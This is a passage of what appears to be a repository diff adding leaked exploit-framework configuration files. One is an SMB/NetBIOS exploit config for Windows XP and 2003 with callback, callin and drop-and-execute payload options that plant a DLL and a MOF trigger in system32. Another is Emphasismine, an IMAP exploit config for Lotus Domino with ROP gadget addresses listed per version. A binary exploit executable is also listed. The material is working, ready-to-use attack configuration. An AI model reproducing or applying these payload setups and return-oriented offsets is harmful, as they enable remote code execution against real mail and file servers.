type="UString"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
<t:paramchoice name="PayloadType"
|
||||
description="Callback from target or callin to target"
|
||||
default="Callback">
|
||||
<t:paramgroup name="Callback"
|
||||
description="Target calls back to plugin">
|
||||
<t:parameter name="CallbackIp"
|
||||
description="Callback IP address"
|
||||
type="IPv4"/>
|
||||
<t:parameter name="CallbackPort"
|
||||
description="Callback port"
|
||||
type="TcpPort"
|
||||
default="0"/>
|
||||
<t:parameter name="CallbackLocalPort"
|
||||
description="Local callback port"
|
||||
type="TcpPort"
|
||||
required="false"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="Callin"
|
||||
description="Target waits for call from plugin">
|
||||
<t:parameter name="ListenPort"
|
||||
description="Listen port"
|
||||
type="TcpPort"/>
|
||||
<t:parameter name="ListenLocalPort"
|
||||
description="Listen port"
|
||||
type="TcpPort"
|
||||
required="false"/>
|
||||
<t:parameter name="ListenWait"
|
||||
description="Timeout to wait before trying to connect in."
|
||||
type="S16"
|
||||
default="10"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="DropAndExecute"
|
||||
description="Payload deployed with no feedback">
|
||||
<t:parameter name="PayloadContract"
|
||||
description="Passthrough contract"
|
||||
type="String"
|
||||
required="false"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
<t:paramchoice name="PayloadSource"
|
||||
description="Payload source input type"
|
||||
default="File">
|
||||
<t:paramgroup name="File"
|
||||
description="Payloads provided by file">
|
||||
<t:parameter name="UnconfiguredDLL"
|
||||
description="The unconfigured DLL file that will be written to target"
|
||||
type="LocalFile"
|
||||
default="esud.dll"/>
|
||||
<t:parameter name="ConfiguredMOF"
|
||||
description="The patched mof file that will be written to target"
|
||||
type="LocalFile"
|
||||
default="nnetcfg.mof"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="Inline"
|
||||
description="Payloads provided inline">
|
||||
<t:parameter name="DLLBuffer"
|
||||
description="The unconfigured DLL file that will be written to target"
|
||||
type="UString"
|
||||
required="false"/>
|
||||
<t:parameter name="MOFBuffer"
|
||||
description="The patched mof file that will be written to target"
|
||||
type="UString"
|
||||
required="false"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
<t:parameter name="RemoteDLLPath"
|
||||
description="The path where we want the DLL to exist on target"
|
||||
type="String"
|
||||
default="\windows\system32\wbem\wbemess2.tlb"/>
|
||||
<t:parameter name="RemoteMOFPath"
|
||||
description="The path where we want the patched mof file to exist on target"
|
||||
type="String"
|
||||
default="\windows\system32\wbem\.\mof\nnetcfg.mof"/>
|
||||
<t:parameter name="RemoteMOFTriggerPath"
|
||||
description="The path where we want the mof trigger file to exist on target"
|
||||
type="String"
|
||||
default="\windows\system32\wbem\.\mof\evntprv.mof"/>
|
||||
<t:parameter name="PrinterName"
|
||||
description="The name of the printer on target"
|
||||
type="UString"
|
||||
format="Scalar"/>
|
||||
</t:inputparameters>
|
||||
|
||||
<t:outputparameters>
|
||||
<t:paramchoice name="PayloadType"
|
||||
description="Payload type determines contract">
|
||||
<t:paramgroup name="StagedUpload"
|
||||
description="Callin or Callback">
|
||||
<t:parameter name="ConnectedTcp"
|
||||
description="Connected TCP Socket to target"
|
||||
type="Socket"/>
|
||||
<t:parameter name="Contract"
|
||||
description="Plugin contract"
|
||||
type="String"
|
||||
value="StagedUpload"/>
|
||||
<t:parameter name="XorMask"
|
||||
description=""
|
||||
type="U8"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="DropAndExecute"
|
||||
description="">
|
||||
<t:parameter name="Contract"
|
||||
description="Plugin contract"
|
||||
type="String"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
</t:outputparameters>
|
||||
|
||||
<t:redirection>
|
||||
<t:local protocol="Tcp"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="//identifier"
|
||||
destport="TargetPort"
|
||||
closeoncompletion="false"/>
|
||||
<t:local protocol="Tcp"
|
||||
listenaddr="TargetIp"
|
||||
listenport="ListenLocalPort"
|
||||
destaddr="//identifier"
|
||||
destport="ListenPort"/>
|
||||
<t:remote protocol="Tcp"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackLocalPort"/>
|
||||
</t:redirection>
|
||||
|
||||
<t:logic>
|
||||
<t:and>
|
||||
<t:or>
|
||||
<t:service name="smb">
|
||||
<t:bindtovalue name="Protocol" value="SMB"/>
|
||||
<t:bindtopath name="TargetPort" path="//service[name='smb']/port"/>
|
||||
</t:service>
|
||||
<t:service name="nbt">
|
||||
<t:bindtovalue name="Protocol" value="NBT"/>
|
||||
<t:bindtopath name="TargetPort" path="//service[name='nbt']/port"/>
|
||||
</t:service>
|
||||
</t:or>
|
||||
<t:or>
|
||||
<t:os family="windows" name="Windows XP" servicepack="1">
|
||||
<t:bindtovalue name="Target" value="XPSP1"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows XP" servicepack="2">
|
||||
<t:bindtovalue name="Target" value="XPSP2"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows XP" servicepack="3">
|
||||
<t:bindtovalue name="Target" value="XPSP3"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2003" servicepack="0">
|
||||
<t:bindtovalue name="Target" value="W2K3SP0"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2003" servicepack="1">
|
||||
<t:bindtovalue name="Target" value="W2K3SP1"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2003" servicepack="2">
|
||||
<t:bindtovalue name="Target" value="W2K3SP2"/>
|
||||
</t:os>
|
||||
</t:or>
|
||||
</t:and>
|
||||
</t:logic>
|
||||
|
||||
</t:config>
|
||||
BIN
windows/exploits/Emeraldthread-3.0.0.exe
Normal file
BIN
windows/exploits/Emeraldthread-3.0.0.exe
Normal file
Binary file not shown.
892
windows/exploits/Emphasismine-3.4.0.0.xml
Normal file
892
windows/exploits/Emphasismine-3.4.0.0.xml
Normal file
|
|
@ -0,0 +1,892 @@
|
|||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<config xmlns="urn:trch"
|
||||
id="0a9ec8318c0f544ba84f56df2e5e3c278844f5bf"
|
||||
name="Emphasismine"
|
||||
version="3.4.0"
|
||||
configversion="3.4.0.0"
|
||||
schemaversion="2.0.0">
|
||||
|
||||
<inputparameters>
|
||||
|
||||
<parameter name="TargetIp" description="Target IP Address" type="IPv4"/>
|
||||
|
||||
<parameter name="TargetPort" description="Port used by the IMAP service" type="TcpPort">
|
||||
<default>143</default>
|
||||
</parameter>
|
||||
|
||||
<parameter name="TargetAcctUsr" type="String" description="Target account username"/>
|
||||
|
||||
<parameter name="TargetAcctPwd" type="String" description="Target account password"/>
|
||||
|
||||
<!-- All plugins that perform blocking network calls must have a NetworkTimeout parameter or its equivalent -->
|
||||
<parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16">
|
||||
<default>60</default>
|
||||
</parameter>
|
||||
|
||||
<!-- This is a template for the version-dependent input parameters -->
|
||||
|
||||
<paramchoice name="DominoVersion" description="The version of Lotus Domino running on the target">
|
||||
<paramgroup name="6.5.4" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x34C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00428463</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0042E038</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x00420CF5</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x60132252</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60951039</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x607112B4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x60168187</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600A371D</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x609DBEA1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x0042845E</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041331B</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
|
||||
<paramgroup name="6.5.5" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x34C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x004283D3</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0042E038</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x00420C15</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x00427989</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60984BC9</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60740B94</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x60169917</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6016B89E</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x60A0FCB1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004283CE</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041323B</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="6.5.5FP1" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x34C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x004283D3</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0042E038</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x00420C15</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x00427989</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60985499</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60741404</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6099F0D7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x6003620D</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x60A108A1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004283CE</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x0041323B</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a001</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d5a7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042cbec</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100aa91d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x606f6ee4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600fa694</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429a6c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050AF</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413E78</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.1" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042Af00</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041D5A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042CBEC</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100AA91D</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x606F9364</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600FA6D4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429A6C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050AF</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413E78</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.2" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A001</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041D5A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042CB58</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100AAADD</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60709A24</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600F8E54</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429A6C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050A7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x6001FAC1</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413E78</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.3" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A091</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041D637</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042CBE8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100AA9ED</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x6071E614</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600F87E4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429AFC</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050B7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050BF</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413F08</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.3FP1" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A091</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041D637</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042CBE8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100AA9ED</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x6071e674</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600f8824</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429AFC</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050B7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050BF</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413F08</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="7.0.4" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042A271</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d817</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042cdde</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x100a9e3d</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60728db4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x60150da4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429cdc</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x00405107</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x0040510f</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413f98</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.0" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429fa1</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043205c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d567</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042caf8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60aa7dab</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60764914</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x60153b14</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429a12</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x00405067</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x0040506f</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413cd8</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.0.1" description="">
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a001</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043205c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d5c7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042cb58</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60abf84b</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x60772714</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x601549d4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429a72</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050b7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050bf</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413d38</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.0.2" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a001</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043205c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041d5c7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042cb58</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60Ace7ab</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x6077a774</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600f9b04</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429a72</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050b7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050bf</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00413d38</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042a361</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305c</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d17a</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042ceb8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
<value>0x60b8de5b</value>
|
||||
</parameter>
|
||||
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
|
||||
<value>0x606068f8</value>
|
||||
</parameter>
|
||||
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
|
||||
<value>0x600f37c4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
|
||||
<value>0x00429dd4</value>
|
||||
</parameter>
|
||||
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050b7</value>
|
||||
</parameter>
|
||||
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
|
||||
<value>0x004050bf</value>
|
||||
</parameter>
|
||||
<parameter name="RetEip" description="" type="U32" hidden="true" >
|
||||
<value>0x00414068</value>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
|
||||
<paramgroup name="8.5.1" description="">
|
||||
<!-- Find non-nIMAP.exe offsets -->
|
||||
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
|
||||
<value>0x22C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
|
||||
<value>0x0042b5d0</value>
|
||||
</parameter>
|
||||
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
|
||||
<value>0x0043305C</value>
|
||||
</parameter>
|
||||
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
|
||||
<value>0x0041db67</value>
|
||||
</parameter>
|
||||
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
|
||||
<value>0x0042d4a0</value>
|
||||
</parameter>
|
||||
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
|
||||
